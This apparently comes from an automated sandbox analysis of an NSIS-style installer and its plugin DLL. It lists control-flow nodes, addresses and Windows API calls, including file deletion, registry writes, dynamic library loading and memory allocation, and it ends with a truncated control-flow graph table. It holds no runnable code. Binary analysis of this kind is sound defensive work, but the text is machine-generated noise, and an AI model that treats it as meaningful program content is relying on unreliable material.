5333->5332 5334 401a00 5335 402b38 18 API calls 5334->5335 5336 401a09 ExpandEnvironmentStringsW 5335->5336 5337 401a30 5336->5337 5338 401a1d 5336->5338 5338->5337 5339 401a22 lstrcmpW 5338->5339 5339->5337 5340 401b01 5341 402b38 18 API calls 5340->5341 5342 401b08 5341->5342 5343 402b1b 18 API calls 5342->5343 5344 401b11 wsprintfW 5343->5344 5345 4029c5 5344->5345 5346 100018c1 5347 10001243 3 API calls 5346->5347 5348 100018e7 5347->5348 5349 10001243 3 API calls 5348->5349 5350 100018ef 5349->5350 5351 10001243 3 API calls 5350->5351 5353 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5350->5353 5352 10001916 5351->5352 5354 1000191f GlobalFree 5352->5354 5355 10001280 2 API calls 5353->5355 5354->5353 5356 10001aad GlobalFree GlobalFree 5355->5356 5357 404581 5358 404591 5357->5358 5359 4045b7 5357->5359 5360 40412d 19 API calls 5358->5360 5361 404194 8 API calls 5359->5361 5362 40459e SetDlgItemTextW 5360->5362 5363 4045c3 5361->5363 5362->5359 5364 405106 5365 405116 5364->5365 5366 40512a 5364->5366 5367 405173 5365->5367 5368 40511c 5365->5368 5369 405132 IsWindowVisible 5366->5369 5375 405149 5366->5375 5370 405178 CallWindowProcW 5367->5370 5371 404179 SendMessageW 5368->5371 5369->5367 5372 40513f 5369->5372 5373 405126 5370->5373 5371->5373 5377 404a5c SendMessageW 5372->5377 5375->5370 5382 404adc 5375->5382 5378 404abb SendMessageW 5377->5378 5379 404a7f GetMessagePos ScreenToClient SendMessageW 5377->5379 5380 404ab3 5378->5380 5379->5380 5381 404ab8 5379->5381 5380->5375 5381->5378 5391 405ee8 lstrcpynW 5382->5391 5384 404aef 5392 405e2f wsprintfW 5384->5392 5386 404af9 5387 40140b 2 API calls 5386->5387 5388 404b02 5387->5388 5393 405ee8 lstrcpynW 5388->5393 5390 404b09 5390->5367 5391->5384 5392->5386 5393->5390 5394 401f08 5395 402b38 18 API calls 5394->5395 5396 401f0f GetFileVersionInfoSizeW 5395->5396 5397 401f36 GlobalAlloc 5396->5397 5398 401f8c 5396->5398 5397->5398 5399 401f4a GetFileVersionInfoW 5397->5399 5399->5398 5400 401f59 VerQueryValueW 5399->5400 5400->5398 5401 401f72 5400->5401 5405 405e2f wsprintfW 5401->5405 5403 401f7e 5406 405e2f wsprintfW 5403->5406 5405->5403 5406->5398 5414 10002a4b 5415 10002a63 5414->5415 5416 100015a7 2 API calls 5415->5416 5417 10002a7e 5416->5417 5418 1000224c 5419 100022b1 5418->5419 5420 100022e7 5418->5420 5419->5420 5421 100022c3 GlobalAlloc 5419->5421 5421->5419 5422 404b0e GetDlgItem GetDlgItem 5423 404b60 7 API calls 5422->5423 5426 404d79 5422->5426 5424 404c03 DeleteObject 5423->5424 5425 404bf6 SendMessageW 5423->5425 5427 404c0c 5424->5427 5425->5424 5433 404e5d 5426->5433 5437 404a5c 5 API calls 5426->5437 5450 404dea 5426->5450 5428 404c43 5427->5428 5431 405f0a 18 API calls 5427->5431 5429 40412d 19 API calls 5428->5429 5432 404c57 5429->5432 5430 404f09 5434 404f13 SendMessageW 5430->5434 5435 404f1b 5430->5435 5436 404c25 SendMessageW SendMessageW 5431->5436 5438 40412d 19 API calls 5432->5438 5433->5430 5439 404eb6 SendMessageW 5433->5439 5465 404d6c 5433->5465 5434->5435 5442 404f34 5435->5442 5443 404f2d ImageList_Destroy 5435->5443 5451 404f44 5435->5451 5436->5427 5437->5450 5456 404c65 5438->5456 5445 404ecb SendMessageW 5439->5445 5439->5465 5440 404194 8 API calls 5446 4050ff 5440->5446 5441 404e4f SendMessageW 5441->5433 5447 404f3d GlobalFree 5442->5447 5442->5451 5443->5442 5444 4050b3 5452 4050c5 ShowWindow GetDlgItem ShowWindow 5444->5452 5444->5465 5449 404ede 5445->5449 5447->5451 5448 404d3a GetWindowLongW SetWindowLongW 5453 404d53 5448->5453 5460 404eef SendMessageW 5449->5460 5450->5433 5450->5441 5451->5444 5464 404adc 4 API calls 5451->5464 5469 404f7f 5451->5469 5452->5465 5454 404d71 5453->5454 5455 404d59 ShowWindow 5453->5455 5474 404162 SendMessageW 5454->5474 5473 404162 SendMessageW 5455->5473 5456->5448 5459 404cb5 SendMessageW 5456->5459 5461 404d34 5456->5461 5462 404cf1 SendMessageW 5456->5462 5463 404d02 SendMessageW 5456->5463 5459->5456 5460->5430 5461->5448 5461->5453 5462->5456 5463->5456 5464->5469 5465->5440 5466 405089 InvalidateRect 5466->5444 5467 40509f 5466->5467 5470 404976 21 API calls 5467->5470 5468 404fad SendMessageW 5472 404fc3 5468->5472 5469->5468 5469->5472 5470->5444 5471 405037 SendMessageW SendMessageW 5471->5472 5472->5466 5472->5471 5473->5465 5474->5426 5475 100016ce 5476 100016fd 5475->5476 5477 10001b3e 24 API calls 5476->5477 5478 10001704 5477->5478 5479 10001717 5478->5479 5480 1000170b 5478->5480 5482 10001721 5479->5482 5483 1000173e 5479->5483 5481 10001280 2 API calls 5480->5481 5489 10001715 5481->5489 5486 10001555 3 API calls 5482->5486 5484 10001744 5483->5484 5485 10001768 5483->5485 5487 100015cc 3 API calls 5484->5487 5488 10001555 3 API calls 5485->5488 5490 10001726 5486->5490 5491 10001749 5487->5491 5488->5489 5492 100015cc 3 API calls 5490->5492 5493 10001280 2 API calls 5491->5493 5494 1000172c 5492->5494 5495 1000174f GlobalFree 5493->5495 5496 10001280 2 API calls 5494->5496 5495->5489 5497 10001763 GlobalFree 5495->5497 5498 10001732 GlobalFree 5496->5498 5497->5489 5498->5489 5499 404910 5500 404920 5499->5500 5501 40493c 5499->5501 5510 4056a8 GetDlgItemTextW 5500->5510 5503 404942 SHGetPathFromIDListW 5501->5503 5504 40496f 5501->5504 5506 404959 SendMessageW 5503->5506 5507 404952 5503->5507 5505 40492d SendMessageW 5505->5501 5506->5504 5508 40140b 2 API calls 5507->5508 5508->5506 5510->5505 5511 401491 5512 405192 25 API calls 5511->5512 5513 401498 5512->5513 4379 402293 4380 402b38 18 API calls 4379->4380 4381 4022a2 4380->4381 4382 402b38 18 API calls 4381->4382 4383 4022ab 4382->4383 4384 402b38 18 API calls 4383->4384 4385 4022b5 GetPrivateProfileStringW 4384->4385 4676 401718 4677 402b38 18 API calls 4676->4677 4678 40171f SearchPathW 4677->4678 4679 40173a 4678->4679 4680 401f98 4681 40205c 4680->4681 4682 401faa 4680->4682 4685 401423 25 API calls 4681->4685 4683 402b38 18 API calls 4682->4683 4684 401fb1 4683->4684 4686 402b38 18 API calls 4684->4686 4690 402195 4685->4690 4687 401fba 4686->4687 4688 401fd0 LoadLibraryExW 4687->4688 4689 401fc2 GetModuleHandleW 4687->4689 4688->4681 4691 401fe1 4688->4691 4689->4688 4689->4691 4703 4062be WideCharToMultiByte 4691->4703 4694 401ff2 4696 402011 4694->4696 4697 401ffa 4694->4697 4695 40202b 4698 405192 25 API calls 4695->4698 4706 10001771 4696->4706 4699 401423 25 API calls 4697->4699 4700 402002 4698->4700 4699->4700 4700->4690 4701 40204e FreeLibrary 4700->4701 4701->4690 4704 4062e8 GetProcAddress 4703->4704 4705 401fec 4703->4705 4704->4705 4705->4694 4705->4695 4707 100017a1 4706->4707 4748 10001b3e 4707->4748 4709 100017a8 4710 100018be 4709->4710 4711 100017c0 4709->4711 4712 100017b9 4709->4712 4710->4700 4782 100022eb 4711->4782 4800 100022a1 4712->4800 4717 10001824 4722 10001866 4717->4722 4723 1000182a 4717->4723 4718 10001806 4813 1000248d 4718->4813 4719 100017d6 4727 100017e7 4719->4727 4728 100017dc 4719->4728 4720 100017ef 4732 100017e5 4720->4732 4810 10002b2b 4720->4810 4725 1000248d 11 API calls 4722->4725 4730 100015cc 3 API calls 4723->4730 4733 10001858 4725->4733 4804 10002614 4727->4804 4728->4732 4794 10002870 4728->4794 4731 10001840 4730->4731 4736 1000248d 11 API calls 4731->4736 4732->4717 4732->4718 4739 100018ad 4733->4739 4837 10002450 4733->4837 4736->4733 4738 100017ed 4738->4732 4739->4710 4741 100018b7 GlobalFree 4739->4741 4741->4710 4745 10001899 4745->4739 4841 10001555 wsprintfW 4745->4841 4746 10001892 FreeLibrary 4746->4745 4844 1000121b GlobalAlloc 4748->4844 4750 10001b62 4845 1000121b GlobalAlloc 4750->4845 4752 10001b6d 4846 10001243 4752->4846 4754 10001da0 GlobalFree GlobalFree GlobalFree 4755 10001dbd 4754->4755 4769 10001e07 4754->4769 4757 1000210d 4755->4757 4763 10001dd2 4755->4763 4755->4769 4756 10001c43 GlobalAlloc 4779 10001b75 4756->4779 4758 1000212f GetModuleHandleW 4757->4758 4757->4769 4761 10002140 LoadLibraryW 4758->4761 4762 10002155 4758->4762 4759 10001c8e lstrcpyW 4764 10001c98 lstrcpyW 4759->4764 4760 10001cac GlobalFree 4760->4779 4761->4762 4761->4769 4857 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4762->4857 4763->4769 4853 1000122c 4763->4853 4764->4779 4766 100021a7 4767 100021b4 lstrlenW 4766->4767 4766->4769 4858 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4767->4858 4769->4709 4770 10002167 4770->4766 4781 10002191 GetProcAddress 4770->4781 4772 10002067 4772->4769 4777 100020af lstrcpyW 4772->4777 4774 10001cea 4774->4779 4851 100015a7 GlobalSize GlobalAlloc 4774->4851 4775 10001f56 GlobalFree 4775->4779 4776 100021ce 4776->4769 4777->4769 4779->4754 4779->4756 4779->4759 4779->4760 4779->4764 4779->4769 4779->4772 4779->4774 4779->4775 4780 1000122c 2 API calls 4779->4780 4856 1000121b GlobalAlloc 4779->4856 4780->4779 4781->4766 4790 10002303 4782->4790 4783 10001243 3 API calls 4783->4790 4785 10002419 GlobalFree 4786 100017c6 4785->4786 4785->4790 4786->4719 4786->4720 4786->4732 4787 100023d5 GlobalAlloc WideCharToMultiByte 4787->4785 4788 1000122c GlobalAlloc lstrcpynW 4788->4790 4789 100023ae GlobalAlloc CLSIDFromString 4789->4785 4790->4783 4790->4785 4790->4787 4790->4788 4790->4789 4791 10002390 lstrlenW 4790->4791 4861 100012c8 4790->4861 4791->4785 4793 1000239b 4791->4793 4793->4785 4866 100025a8 4793->4866 4796 10002882 4794->4796 4795 10002927 EnumWindows 4797 10002945 4795->4797 4796->4795 4798 10002a41 4797->4798 4799 10002a36 GetLastError 4797->4799 4798->4732 4799->4798 4801 100022b1 4800->4801 4802 100017bf 4800->4802 4801->4802 4803 100022c3 GlobalAlloc 4801->4803 4802->4711 4803->4801 4808 10002630 4804->4808 4805 10002681 GlobalAlloc 4809 100026a3 4805->4809 4806 10002694 4807 10002699 GlobalSize 4806->4807 4806->4809 4807->4809 4808->4805 4808->4806 4809->4738 4811 10002b36 4810->4811 4812 10002b76 GlobalFree 4811->4812 4817 100024ad 4813->4817 4815 10002540 lstrcpyW 4815->4817 4816 100024db wsprintfW 4816->4817 4817->4815 4817->4816 4818 10002561 GlobalFree 4817->4818 4819 1000250e MultiByteToWideChar 4817->4819 4820 1000258a GlobalFree 4817->4820 4822 100024fd lstrcpynW 4817->4822 4823 10001280 2 API calls 4817->4823 4824 100024ec StringFromGUID2 4817->4824 4869 1000121b GlobalAlloc 4817->4869 4870 100012f3 4817->4870 4818->4817 4819->4817 4820->4817 4821 1000180c 4820->4821 4826 100015cc 4821->4826 4822->4817 4823->4817 4824->4817 4874 1000121b GlobalAlloc 4826->4874 4828 100015d2 4829 100015df lstrcpyW 4828->4829 4831 100015f9 4828->4831 4832 10001613 4829->4832 4831->4832 4833 100015fe wsprintfW 4831->4833 4834 10001280 4832->4834 4833->4832 4835 100012c3 GlobalFree 4834->4835 4836 10001289 GlobalAlloc lstrcpynW 4834->4836 4835->4733 4836->4835 4838 1000245e 4837->4838 4839 10001879 4837->4839 4838->4839 4840 1000247a GlobalFree 4838->4840 4839->4745 4839->4746 4840->4838 4842 10001280 2 API calls 4841->4842 4843 10001576 4842->4843 4843->4739 4844->4750 4845->4752 4847 1000127c 4846->4847 4848 1000124d 4846->4848 4847->4779 4848->4847 4859 1000121b GlobalAlloc 4848->4859 4850 10001259 lstrcpyW GlobalFree 4850->4779 4852 100015c5 4851->4852 4852->4774 4860 1000121b GlobalAlloc 4853->4860 4855 1000123b lstrcpynW 4855->4769 4856->4779 4857->4770 4858->4776 4859->4850 4860->4855 4862 100012d0 4861->4862 4863 100012ee 4861->4863 4862->4863 4864 1000122c 2 API calls 4862->4864 4863->4863 4865 100012ec 4864->4865 4865->4790 4867 100025b6 VirtualAlloc 4866->4867 4868 1000260c 4866->4868 4867->4868 4868->4793 4869->4817 4871 10001324 4870->4871 4872 100012fc 4870->4872 4871->4817 4872->4871 4873 10001308 lstrcpyW 4872->4873 4873->4871 4874->4828 5514 10001058 5515 10001243 3 API calls 5514->5515 5517 10001074 5515->5517 5516 100010dd 5517->5516 5518 1000152e 4 API calls 5517->5518 5519 10001092 5517->5519 5518->5519 5520 1000152e 4 API calls 5519->5520 5521 100010a2 5520->5521 5522 100010b2 5521->5522 5523 100010a9 GlobalSize 5521->5523 5524 100010b6 GlobalAlloc 5522->5524 5525 100010c7 5522->5525 5523->5522 5526 10001555 3 API calls 5524->5526 5527 100010d2 GlobalFree 5525->5527 5526->5525 5527->5516 5528 40159b 5529 402b38 18 API calls 5528->5529 5530 4015a2 SetFileAttributesW 5529->5530 5531 4015b4 5530->5531 4910 40219e 4911 402b38 18 API calls 4910->4911 4912 4021a4 4911->4912 4913 402b38 18 API calls 4912->4913 4914 4021ad 4913->4914 4915 402b38 18 API calls 4914->4915 4916 4021b6 4915->4916 4917 40622b 2 API calls 4916->4917 4918 4021bf 4917->4918 4919 4021d0 lstrlenW lstrlenW 4918->4919 4920 4021c3 4918->4920 4922 405192 25 API calls 4919->4922 4921 405192 25 API calls 4920->4921 4924 4021cb 4920->4924 4921->4924 4923 40220e SHFileOperationW 4922->4923 4923->4920 4923->4924 5532 40149e 5533 40223c 5532->5533 5534 4014ac PostQuitMessage 5532->5534 5534->5533 5535 4029a0 SendMessageW 5536 4029ba InvalidateRect 5535->5536 5537 4029c5 5535->5537 5536->5537 5545 100010e1 5546 10001111 5545->5546 5547 10001243 3 API calls 5546->5547 5557 10001121 5547->5557 5548 100011d8 GlobalFree 5549 100012c8 2 API calls 5549->5557 5550 100011d3 5550->5548 5551 10001243 3 API calls 5551->5557 5552 10001164 GlobalAlloc 5552->5557 5553 100011f8 GlobalFree 5553->5557 5554 10001280 2 API calls 5556 100011c4 GlobalFree 5554->5556 5555 100012f3 lstrcpyW 5555->5557 5556->5557 5557->5548 5557->5549 5557->5550 5557->5551 5557->5552 5557->5553 5557->5554 5557->5555 5557->5556 3904 401b22 3905 401b73 3904->3905 3906 401b2f 3904->3906 3907 401b78 3905->3907 3908 401b9d GlobalAlloc 3905->3908 3909 401bb8 3906->3909 3912 401b46 3906->3912 3917 40223c 3907->3917 3943 405ee8 lstrcpynW 3907->3943 3923 405f0a 3908->3923 3910 405f0a 18 API calls 3909->3910 3909->3917 3913 402236 3910->3913 3941 405ee8 lstrcpynW 3912->3941 3944 4056c4 3913->3944 3916 401b8a GlobalFree 3916->3917 3918 401b55 3942 405ee8 lstrcpynW 3918->3942 3921 401b64 3948 405ee8 lstrcpynW 3921->3948 3924 405f17 3923->3924 3925 406162 3924->3925 3928 405fca GetVersion 3924->3928 3929 406130 lstrlenW 3924->3929 3932 405f0a 10 API calls 3924->3932 3934 406045 GetSystemDirectoryW 3924->3934 3935 406058 GetWindowsDirectoryW 3924->3935 3937 40608c SHGetSpecialFolderLocation 3924->3937 3938 405f0a 10 API calls 3924->3938 3939 4060d1 lstrcatW 3924->3939 3949 405db5 RegOpenKeyExW 3924->3949 3954 40617c 3924->3954 3963 405e2f wsprintfW 3924->3963 3964 405ee8 lstrcpynW 3924->3964 3926 406178 3925->3926 3965 405ee8 lstrcpynW 3925->3965 3926->3909 3928->3924 3929->3924 3932->3929 3934->3924 3935->3924 3937->3924 3940 4060a4 SHGetPathFromIDListW CoTaskMemFree 3937->3940 3938->3924 3939->3924 3940->3924 3941->3918 3942->3921 3943->3916 3945 4056d9 3944->3945 3946 405725 3945->3946 3947 4056ed MessageBoxIndirectW 3945->3947 3946->3917 3947->3946 3948->3917 3950 405e29 3949->3950 3951 405de9 RegQueryValueExW 3949->3951 3950->3924 3952 405e0a RegCloseKey 3951->3952 3952->3950 3961 406189 3954->3961 3955 4061ff 3956 406204 CharPrevW 3955->3956 3958 406225 3955->3958 3956->3955 3957 4061f2 CharNextW 3957->3955 3957->3961 3958->3924 3960 4061de CharNextW 3960->3961 3961->3955 3961->3957 3961->3960 3962 4061ed CharNextW 3961->3962 3966 405960 3961->3966 3962->3957 3963->3924 3964->3924 3965->3926 3967 405966 3966->3967 3968 40597c 3967->3968 3969 40596d CharNextW 3967->3969 3968->3961 3969->3967 5558 402222 5559 402229 5558->5559 5562 40223c 5558->5562 5560 405f0a 18 API calls 5559->5560 5561 402236 5560->5561 5563 4056c4 MessageBoxIndirectW 5561->5563 5563->5562 3970 401924 3971 401926 3970->3971 3976 402b38 3971->3976 3977 402b44 3976->3977 3978 405f0a 18 API calls 3977->3978 3979 402b65 3978->3979 3980 40192b 3979->3980 3981 40617c 5 API calls 3979->3981 3982 405770 3980->3982 3981->3980 4021 405a3b 3982->4021 3985 405798 DeleteFileW 3987 401934 3985->3987 3986 4057af 3988 4058da 3986->3988 4035 405ee8 lstrcpynW 3986->4035 3988->3987 4065 40622b FindFirstFileW 3988->4065 3990 4057d5 3991 4057e8 3990->3991 3992 4057db lstrcatW 3990->3992 4036 40597f lstrlenW 3991->4036 3993 4057ee 3992->3993 3997 4057fe lstrcatW 3993->3997 3999 405809 lstrlenW FindFirstFileW 3993->3999 3997->3999 3998 4058f8 4068 405933 lstrlenW CharPrevW 3998->4068 4002 4058cf 3999->4002 4019 40582b 3999->4019 4002->3988 4003 4058b2 FindNextFileW 4007 4058c8 FindClose 4003->4007 4003->4019 4004 405728 5 API calls 4006 40590a 4004->4006 4008 405924 4006->4008 4009 40590e 4006->4009 4007->4002 4011 405192 25 API calls 4008->4011 4009->3987 4012 405192 25 API calls 4009->4012 4011->3987 4014 40591b 4012->4014 4013 405770 64 API calls 4013->4019 4016 405d82 40 API calls 4014->4016 4015 405192 25 API calls 4015->4003 4018 405922 4016->4018 4018->3987 4019->4003 4019->4013 4019->4015 4040 405ee8 lstrcpynW 4019->4040 4041 405728 4019->4041 4049 405192 4019->4049 4060 405d82 4019->4060 4071 405ee8 lstrcpynW 4021->4071 4023 405a4c 4072 4059de CharNextW CharNextW 4023->4072 4026 405790 4026->3985 4026->3986 4027 40617c 5 API calls 4033 405a62 4027->4033 4028 405a93 lstrlenW 4029 405a9e 4028->4029 4028->4033 4031 405933 3 API calls 4029->4031 4030 40622b 2 API calls 4030->4033 4032 405aa3 GetFileAttributesW 4031->4032 4032->4026 4033->4026 4033->4028 4033->4030 4034 40597f 2 API calls 4033->4034 4034->4028 4035->3990 4037 40598d 4036->4037 4038 405993 CharPrevW 4037->4038 4039 40599f 4037->4039 4038->4037 4038->4039 4039->3993 4040->4019 4078 405b2f GetFileAttributesW 4041->4078 4044 405743 RemoveDirectoryW 4047 405751 4044->4047 4045 40574b DeleteFileW 4045->4047 4046 405755 4046->4019 4047->4046 4048 405761 SetFileAttributesW 4047->4048 4048->4046 4050 4051ad 4049->4050 4051 40524f 4049->4051 4052 4051c9 lstrlenW 4050->4052 4053 405f0a 18 API calls 4050->4053 4051->4019 4054 4051f2 4052->4054 4055 4051d7 lstrlenW 4052->4055 4053->4052 4057 405205 4054->4057 4058 4051f8 SetWindowTextW 4054->4058 4055->4051 4056 4051e9 lstrcatW 4055->4056 4056->4054 4057->4051 4059 40520b SendMessageW SendMessageW SendMessageW 4057->4059 4058->4057 4059->4051 4081 406252 GetModuleHandleA 4060->4081 4064 405daa 4064->4019 4066 406241 FindClose 4065->4066 4067 4058f4 4065->4067 4066->4067 4067->3987 4067->3998 4069 4058fe 4068->4069 4070 40594f lstrcatW 4068->4070 4069->4004 4070->4069 4071->4023 4073 4059fb 4072->4073 4076 405a0d 4072->4076 4075 405a08 CharNextW 4073->4075 4073->4076 4074 405a31 4074->4026 4074->4027 4075->4074 4076->4074 4077 405960 CharNextW 4076->4077 4077->4076 4079 405b41 SetFileAttributesW 4078->4079 4080 405734 4078->4080 4079->4080 4080->4044 4080->4045 4080->4046 4082 406279 GetProcAddress 4081->4082 4083 40626e LoadLibraryA 4081->4083 4084 405d89 4082->4084 4083->4082 4083->4084 4084->4064 4085 405c06 lstrcpyW 4084->4085 4086 405c55 GetShortPathNameW 4085->4086 4087 405c2f 4085->4087 4088 405c6a 4086->4088 4089 405d7c 4086->4089 4110 405b54 GetFileAttributesW CreateFileW 4087->4110 4088->4089 4091 405c72 wsprintfA 4088->4091 4089->4064 4093 405f0a 18 API calls 4091->4093 4092 405c39 CloseHandle GetShortPathNameW 4092->4089 4094 405c4d 4092->4094 4095 405c9a 4093->4095 4094->4086 4094->4089 4111 405b54 GetFileAttributesW CreateFileW 4095->4111 4097 405ca7 4097->4089 4098 405cb6 GetFileSize GlobalAlloc 4097->4098 4099 405d75 CloseHandle 4098->4099 4100 405cd8 4098->4100 4099->4089 4112 405bd7 ReadFile 4100->4112 4105 405cf7 lstrcpyA 4108 405d19 4105->4108 4106 405d0b 4107 405ab9 4 API calls 4106->4107 4107->4108 4109 405d50 SetFilePointer WriteFile GlobalFree 4108->4109 4109->4099 4110->4092 4111->4097 4113 405bf5 4112->4113 4113->4099 4114 405ab9 lstrlenA 4113->4114 4115 405afa lstrlenA 4114->4115 4116 405b02 4115->4116 4117 405ad3 lstrcmpiA 4115->4117 4116->4105 4116->4106 4117->4116 4118 405af1 CharNextA 4117->4118 4118->4115 5564 10001667 5565 1000152e 4 API calls 5564->5565 5568 1000167f 5565->5568 5566 100016c5 GlobalFree 5567 1000169a 5567->5566 5568->5566 5568->5567 5569 100016b1 VirtualFree 5568->5569 5569->5566 5570 402727 5571 4029c5 5570->5571 5572 40272e 5570->5572 5573 402734 FindClose 5572->5573 5573->5571 5574 401cab 5575 402b1b 18 API calls 5574->5575 5576 401cb2 5575->5576 5577 402b1b 18 API calls 5576->5577 5578 401cba GetDlgItem 5577->5578 5579 4024e6 5578->5579 4130 40232f 4131 402335 4130->4131 4132 402b38 18 API calls 4131->4132 4133 402347 4132->4133 4134 402b38 18 API calls 4133->4134 4135 402351 RegCreateKeyExW 4134->4135 4136 40237b 4135->4136 4138 402791 4135->4138 4137 402396 4136->4137 4139 402b38 18 API calls 4136->4139 4142 402b1b 18 API calls 4137->4142 4145 4023a2 4137->4145 4141 40238c lstrlenW 4139->4141 4140 4023bd RegSetValueExW 4144 4023d3 RegCloseKey 4140->4144 4141->4137 4142->4145 4144->4138 4145->4140 4147 403060 4145->4147 4148 403070 SetFilePointer 4147->4148 4149 40308c 4147->4149 4148->4149 4162 40317b GetTickCount 4149->4162 4152 405bd7 ReadFile 4153 4030ac 4152->4153 4154 40317b 43 API calls 4153->4154 4158 403137 4153->4158 4155 4030c3 4154->4155 4156 40313d ReadFile 4155->4156 4155->4158 4159 4030d3 4155->4159 4156->4158 4158->4140 4159->4158 4160 405bd7 ReadFile 4159->4160 4161 403106 WriteFile 4159->4161 4160->4159 4161->4158 4161->4159 4163 4032e5 4162->4163 4164 4031aa 4162->4164 4165 402d18 33 API calls 4163->4165 4175 40330d SetFilePointer 4164->4175 4171 403093 4165->4171 4167 4031b5 SetFilePointer 4172 4031da 4167->4172 4171->4152 4171->4158 4172->4171 4173 40326f WriteFile 4172->4173 4174 4032c6 SetFilePointer 4172->4174 4176 4032f7 4172->4176 4179 40638e 4172->4179 4186 402d18 4172->4186 4173->4171 4173->4172 4174->4163 4175->4167 4177 405bd7 ReadFile 4176->4177 4178 40330a 4177->4178 4178->4172 4180 4063b3 4179->4180 4181 4063bb 4179->4181 4180->4172 4181->4180 4182 406442 GlobalFree 4181->4182 4183 40644b GlobalAlloc 4181->4183 4184 4064c2 GlobalAlloc 4181->4184 4185 4064b9 GlobalFree 4181->4185 4182->4183 4183->4180 4183->4181 4184->4180 4184->4181 4185->4184 4187 402d41 4186->4187 4188 402d29 4186->4188 4190 402d51 GetTickCount 4187->4190 4191 402d49 4187->4191 4189 402d32 DestroyWindow 4188->4189 4192 402d39 4188->4192 4189->4192 4190->4192 4193 402d5f 4190->4193 4201 40628b 4191->4201 4192->4172 4195 402d94 CreateDialogParamW ShowWindow 4193->4195 4196 402d67 4193->4196 4195->4192 4196->4192 4205 402cfc 4196->4205 4198 402d75 wsprintfW 4199 405192 25 API calls 4198->4199 4200 402d92 4199->4200 4200->4192 4202 4062a8 PeekMessageW 4201->4202 4203 4062b8 4202->4203 4204 40629e DispatchMessageW 4202->4204 4203->4192 4204->4202 4206 402d0b 4205->4206 4207 402d0d MulDiv 4205->4207 4206->4207 4207->4198 5580 4016af 5581 402b38 18 API calls 5580->5581 5582 4016b5 GetFullPathNameW 5581->5582 5583 4016cf 5582->5583 5584 4016f1 5582->5584 5583->5584 5587 40622b 2 API calls 5583->5587 5585 4029c5 5584->5585 5586 401706 GetShortPathNameW 5584->5586 5586->5585 5588 4016e1 5587->5588 5588->5584 5590 405ee8 lstrcpynW 5588->5590 5590->5584 5598 4027b3 5599 402b38 18 API calls 5598->5599 5600 4027c1 5599->5600 5601 4027d7 5600->5601 5602 402b38 18 API calls 5600->5602 5603 405b2f 2 API calls 5601->5603 5602->5601 5604 4027dd 5603->5604 5624 405b54 GetFileAttributesW CreateFileW 5604->5624 5606 4027ea 5607 402893 5606->5607 5608 4027f6 GlobalAlloc 5606->5608 5611 40289b DeleteFileW 5607->5611 5612 4028ae 5607->5612 5609 40288a CloseHandle 5608->5609 5610 40280f 5608->5610 5609->5607 5625 40330d SetFilePointer 5610->5625 5611->5612 5614 402815 5615 4032f7 ReadFile 5614->5615 5616 40281e GlobalAlloc 5615->5616 5617 402862 WriteFile GlobalFree 5616->5617 5618 40282e 5616->5618 5619 403060 46 API calls 5617->5619 5620 403060 46 API calls 5618->5620 5621 402887 5619->5621 5623 40283b 5620->5623 5621->5609 5622 402859 GlobalFree 5622->5617 5623->5622 5624->5606 5625->5614 5626 4028b4 5627 402b1b 18 API calls 5626->5627 5628 4028ba 5627->5628 5629 4028f6 5628->5629 5630 4028dd 5628->5630 5635 402791 5628->5635 5633 402900 5629->5633 5634 40290c 5629->5634 5631 4028e2 5630->5631 5632 4028f3 5630->5632 5640 405ee8 lstrcpynW 5631->5640 5632->5635 5641 405e2f wsprintfW 5632->5641 5636 402b1b 18 API calls 5633->5636 5637 405f0a 18 API calls 5634->5637 5636->5632 5637->5632 5640->5635 5641->5635 5642 4014b8 5643 4014be 5642->5643 5644 401389 2 API calls 5643->5644 5645 4014c6 5644->5645 4875 4015b9 4876 402b38 18 API calls 4875->4876 4877 4015c0 4876->4877 4878 4059de 4 API calls 4877->4878 4888 4015c9 4878->4888 4879 401614 4881 401646 4879->4881 4882 401619 4879->4882 4880 405960 CharNextW 4883 4015d7 CreateDirectoryW 4880->4883 4887 401423 25 API calls 4881->4887 4884 401423 25 API calls 4882->4884 4885 4015ed GetLastError 4883->4885 4883->4888 4886 401620 4884->4886 4885->4888 4889 4015fa GetFileAttributesW 4885->4889 4893 405ee8 lstrcpynW 4886->4893 4892 40163e 4887->4892 4888->4879 4888->4880 4889->4888 4891 40162d SetCurrentDirectoryW 4891->4892 4893->4891 5646 401939 5647 402b38 18 API calls 5646->5647 5648 401940 lstrlenW 5647->5648 5649 4024e6 5648->5649 5650 402939 5651 402b1b 18 API calls 5650->5651 5652 40293f 5651->5652 5653 402972 5652->5653 5655 402791 5652->5655 5656 40294d 5652->5656 5654 405f0a 18 API calls 5653->5654 5653->5655 5654->5655 5656->5655 5658 405e2f wsprintfW 5656->5658 5658->5655 5659 40653d 5663 4063c1 5659->5663 5660 406d2c 5661 406442 GlobalFree 5662 40644b GlobalAlloc 5661->5662 5662->5660 5662->5663 5663->5660 5663->5661 5663->5662 5664 4064c2 GlobalAlloc 5663->5664 5665 4064b9 GlobalFree 5663->5665 5664->5660 5664->5663 5665->5664 4925 40173f 4926 402b38 18 API calls 4925->4926 4927 401746 4926->4927 4928 405b83 2 API calls 4927->4928 4929 40174d 4928->4929 4930 405b83 2 API calls 4929->4930 4930->4929

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 403358-4033ee #17 SetErrorMode OleInitialize call 406252 SHGetFileInfoW call 405ee8 GetCommandLineW call 405ee8 GetModuleHandleW 7 4033f0-4033f7 0->7 8 4033f8-40340a call 405960 CharNextW 0->8 7->8 11 4034d8-4034de 8->11 12 4034e4 11->12 13 40340f-403415 11->13 16 4034f8-403512 GetTempPathW call 403324 12->16 14 403417-40341c 13->14 15 40341e-403424 13->15 14->14 14->15 18 403426-40342a 15->18 19 40342b-40342f 15->19 23 403514-403532 GetWindowsDirectoryW lstrcatW call 403324 16->23 24 40356a-403584 DeleteFileW call 402dba 16->24 18->19 21 403435-40343b 19->21 22 4034c9-4034d4 call 405960 19->22 26 403455-40346c 21->26 27 40343d-403444 21->27 22->11 39 4034d6-4034d7 22->39 23->24 42 403534-403564 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403324 23->42 44 40361a-403629 call 4037c0 OleUninitialize 24->44 45 40358a-403590 24->45 28 40349a-4034b0 26->28 29 40346e-403484 26->29 33 403446-403449 27->33 34 40344b 27->34 28->22 37 4034b2-4034c7 28->37 29->28 35 403486-40348e 29->35 33->26 33->34 34->26 40 403490-403493 35->40 41 403495 35->41 37->22 43 